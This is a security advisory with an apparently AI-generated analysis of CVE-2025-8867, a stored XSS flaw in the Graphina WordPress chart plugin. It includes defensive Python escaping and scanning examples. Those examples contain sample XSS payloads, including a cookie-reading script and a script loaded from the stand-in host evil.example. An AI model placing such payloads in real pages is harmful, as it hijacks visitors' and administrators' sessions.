
CVE-2025-8867: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in iqonicdesign Graphina – Elementor Charts and Graphs

Severity: Medium
Tags: Vulnerability, CVE-2025-8867, CWE-79
Published: Fri Aug 15 2025 (08/15/2025, 02:24:23 UTC)
Source: CVE Database V5
Vendor/Project: iqonicdesign
Product: Graphina – Elementor Charts and Graphs

Description

The Graphina - Elementor Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple chart widget parameters in version 3.1.3 and below. This is due to insufficient input sanitization and output escaping on user supplied attributes such as chart categories, titles, and tooltip settings. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AI-Powered Analysis

Last updated: 08/15/2025, 02:48:46 UTC

Technical Analysis

CVE-2025-8867 is a stored cross-site scripting (XSS) vulnerability in the Graphina – Elementor Charts and Graphs WordPress plugin by iqonicdesign, affecting version 3.1.3 and earlier. Chart widget settings that users supply (chart categories, titles and tooltip settings) are neither sanitized on input nor escaped when the widget is rendered, so a string containing HTML or JavaScript is written into the page as-is. An authenticated user with the Contributor role or higher can place such a payload in a chart widget; because widget settings are saved with the post, the payload persists and runs in the browser of every visitor who loads the page, including the editors and administrators who preview or review it.

Two points matter when judging exposure. First, WordPress strips script tags and event-handler attributes from post content for users without the unfiltered_html capability (Contributors and Authors on a standard install), so the danger here is the plugin writing its own widget settings to the page outside that filter. Second, a Contributor cannot publish: a post they create waits for an Editor or Administrator to review it, and the reviewer's preview is a natural first victim, which turns a low-privilege account into a path to a privileged session.

The weakness is CWE-79 (improper neutralization of input during web page generation). The CVSS v3.1 base score is 6.4 (medium): network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L), no user interaction (UI:N), changed scope (S:C) because the script runs in the visitor's browser rather than in the plugin itself, low confidentiality and integrity impact (C:L/I:L) and no availability impact (A:N). No exploitation in the wild had been reported at the time of publication. The usual stored-XSS consequences apply: WordPress authentication cookies are HttpOnly by default, but script running in an administrator's session can still call the REST API or admin-ajax endpoints with that user's nonce, so account creation, option changes, defacement and redirection to attacker-controlled sites are all within reach. Sites that let Contributor-level users build content with Elementor widgets are the ones exposed. The record carries no patch reference, so confirm the fixed version with the vendor or the Wordfence advisory before relying on an update, and apply the mitigations below in the meantime.
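The two output contexts the analysis describes (an HTML attribute and an inline script that configures the chart library) need different escaping, and the wrong one for either context leaves the page injectable. The following added example is not Graphina's code and not taken from the advisory: it models a hypothetical widget template in Python, once writing the settings verbatim and once escaping each sink for its context, with constructed payloads. The setting names, the template markup and the payload strings are assumptions made for the illustration.

```python
import html
import json

# Constructed payloads standing in for attacker-supplied chart settings.
# They are illustrations only, not payloads taken from the advisory.
EVIL_TITLE = 'Sales"><img src=x onerror=alert(1)>'
EVIL_CATEGORY = 'Q2</script><script>alert(document.cookie)</script>'


def render_vulnerable(title, categories):
    """Hypothetical widget template that writes settings verbatim.

    It stands in for the unescaped output path the advisory describes; it is
    not Graphina's code. The title lands in an HTML attribute, and the title
    and categories land in an inline <script> that configures the chart.
    """
    cats = ", ".join('"%s"' % c for c in categories)
    return (
        '<div class="chart" data-title="%s"></div>\n' % title
        + '<script>var cfg = {title: "%s", categories: [%s]};</script>' % (title, cats)
    )


def js_safe_json(value):
    """Serialise a value for embedding inside a <script> element.

    json.dumps leaves '<', '>' and '&' untouched, so '</script>' inside a
    string would still terminate the script element for the HTML parser.
    Rewriting those characters as JSON \\u escapes keeps the value identical
    to JavaScript while removing anything the HTML parser could act on.
    """
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def roundtrips(value):
    """True if js_safe_json still decodes to the original value."""
    return json.loads(js_safe_json(value)) == value


def render_hardened(title, categories):
    """Same template with context-appropriate escaping for each sink."""
    attr = html.escape(title, quote=True)  # HTML attribute context
    cfg = js_safe_json({"title": title, "categories": list(categories)})
    return (
        '<div class="chart" data-title="%s"></div>\n' % attr
        + "<script>var cfg = %s;</script>" % cfg
    )


def count_script_elements(markup):
    """Number of <script ...> start tags the HTML parser would see."""
    return markup.lower().count("<script")


def has_injected_element(markup):
    """True if attacker markup broke out of the attribute or the script block."""
    return "<img" in markup.lower() or count_script_elements(markup) > 1


if __name__ == "__main__":
    bad = render_vulnerable(EVIL_TITLE, ["Q1", EVIL_CATEGORY])
    good = render_hardened(EVIL_TITLE, ["Q1", EVIL_CATEGORY])
    print("vulnerable output has injected element:", has_injected_element(bad))
    print("hardened output has injected element:", has_injected_element(good))
    print(good)
```

The point of the two escapers is that neither alone is enough: html.escape protects the attribute but would corrupt the JSON, and JSON encoding protects the script block only once the angle brackets are rewritten, because the HTML parser does not understand JSON string boundaries. In a PHP plugin the same split is esc_attr() for the attribute and wp_json_encode() for the configuration object.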

Potential Impact

For European organizations running WordPress sites with the Graphina plugin for data visualization, exploitation means attacker-controlled script executing in the browsers of site visitors and, more importantly, of the editors and administrators who review contributor content. The consequences are credential and nonce theft, session abuse, and actions performed on the site with the victim's privileges, which can lead to defacement, data exposure and further compromise of the WordPress installation. Where the site processes personal data, such an incident is a breach under the GDPR, and Article 32 requires security measures appropriate to the risk, so leaving a known stored-XSS flaw unmitigated weakens an organization's position with regulators. Because Contributor-level access is enough, the realistic attacker is an insider, a compromised contributor account, or a site that hands out contributor accounts liberally (guest posting, community content). Stored XSS persists: once injected, a payload keeps firing for every visitor until the content is cleaned, so exposure grows with time. Public-facing WordPress sites in finance, healthcare, government and e-commerce, where visitor trust and data sensitivity are highest, are the most affected.

Mitigation Recommendations

1. Restrict the Contributor role to trusted users and audit existing Contributor, Author and Editor accounts for suspicious logins and recent edits. If your Elementor version offers a Role Manager under its settings, use it to keep Contributors out of the Elementor editor until the plugin is fixed.
2. Check the installed plugin version (Plugins screen or `wp plugin list`). If it is 3.1.3 or below and no fixed release is available, deactivate or remove the plugin. Note that deactivation stops the widgets from rendering but leaves the stored widget settings in the database, so the content still needs to be scanned and cleaned.
3. Add Web Application Firewall (WAF) rules for script tags, event-handler attributes and javascript: URIs in the requests that save Elementor content (admin-ajax and REST saves). Expect false positives on legitimate HTML widgets; scope the rules by role or path rather than applying them site-wide.
4. Deploy a Content Security Policy (CSP). Chart plugins emit inline scripts and rely on inline configuration, so a policy without 'unsafe-inline' will break the charts unless the site uses nonces or hashes; start in report-only mode and tighten script-src once the legitimate sources are known.
5. Search stored content for injected payloads. Elementor keeps widget settings as JSON in the _elementor_data post meta, so scan that meta and post revisions for script tags, on*= handlers and javascript: URIs, and cross-check hits against the post author and modification date.
6. Once the vendor publishes a fixed version, update promptly and re-run the content scan, since an update does not remove payloads already stored.
7. Educate content contributors about safe input and the risk of pasting untrusted markup into widget settings.
8. Include user-input handling in WordPress plugins in periodic security reviews and penetration tests.
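Step 5 above says to scan the stored widget settings. The following added example (not Graphina's or Elementor's code) walks an _elementor_data document, which Elementor stores in wp_postmeta as a JSON tree of elements with elType, settings and child elements, and reports every string inside a widget's settings that contains script-like content. The sample document, the widget type name "graphina_line_chart" and the setting keys are constructed for the illustration; the real widget names and keys on a given site may differ, which is why the scanner inspects every widget by default rather than filtering on a name.

```python
import json
import re

# Constructed _elementor_data document in the shape Elementor stores in the
# wp_postmeta table (a JSON tree of elements, each with elType, settings and
# child elements; widgets carry a widgetType). The widget type names and the
# setting keys below are hypothetical; check the real ones on your site.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1f2", "elType": "section", "settings": {}, "elements": [
        {"id": "b3c4", "elType": "column", "settings": {"_column_size": 100}, "elements": [
            {"id": "c5d6", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "Quarterly revenue"}, "elements": []},
            {"id": "d7e8", "elType": "widget", "widgetType": "graphina_line_chart",
             "settings": {
                 "chart_title": 'Sales"><img src=x onerror=alert(1)>',
                 "categories": ["Q1", "Q2", "Q3</script><script src=//evil.example/x.js></script>"],
                 "tooltip": {"enabled": "yes", "prefix": "javascript:alert(1)"},
             }, "elements": []},
        ]},
    ]},
])

# Patterns that should never appear in a chart label, category or tooltip string.
SUSPICIOUS = [
    ("script_tag", re.compile(r"<\s*/?\s*script", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("embedded_element", re.compile(r"<\s*(?:img|svg|iframe|object|embed|math)\b", re.I)),
]


def _walk_values(node, path):
    """Yield (path, string) for every string nested inside a settings value."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from _walk_values(value, path + [str(key)])
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk_values(value, path + [str(index)])


def _walk_widgets(elements):
    """Yield every widget element, descending through sections and columns."""
    for element in elements:
        if element.get("elType") == "widget":
            yield element
        yield from _walk_widgets(element.get("elements", []))


def scan_elementor_data(raw_json, widget_filter=None):
    """Return findings for widget settings that carry script-like content.

    widget_filter: optional callable on widgetType. By default every widget is
    inspected, so an unexpected widget name cannot hide a payload.
    """
    findings = []
    for widget in _walk_widgets(json.loads(raw_json)):
        wtype = widget.get("widgetType", "")
        if widget_filter and not widget_filter(wtype):
            continue
        for path, text in _walk_values(widget.get("settings", {}), []):
            for name, pattern in SUSPICIOUS:
                if pattern.search(text):
                    findings.append({
                        "widget_id": widget.get("id"),
                        "widget_type": wtype,
                        "setting": ".".join(path),
                        "pattern": name,
                        "value": text,
                    })
                    break  # one finding per setting value is enough
    return findings


if __name__ == "__main__":
    for f in scan_elementor_data(SAMPLE_ELEMENTOR_DATA):
        print(f"{f['widget_id']} {f['widget_type']} {f['setting']}: "
              f"{f['pattern']} -> {f['value']!r}")
```

To run it against a live site, export the meta value per post, for example with `wp post meta get <post_id> _elementor_data`, and pass the string to scan_elementor_data(). A hit is a lead, not proof of exploitation: compare the post's author and revision history with the list of contributor accounts before deciding whether the account or only the content needs to be dealt with.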


Technical Details

Data Version: 5.1
Assigner Short Name: Wordfence
Date Reserved: 2025-08-11T14:50:39.233Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 689e9c51ad5a09ad00615fbb
Added to database: 8/15/2025, 2:32:49 AM
Last enriched: 8/15/2025, 2:48:46 AM
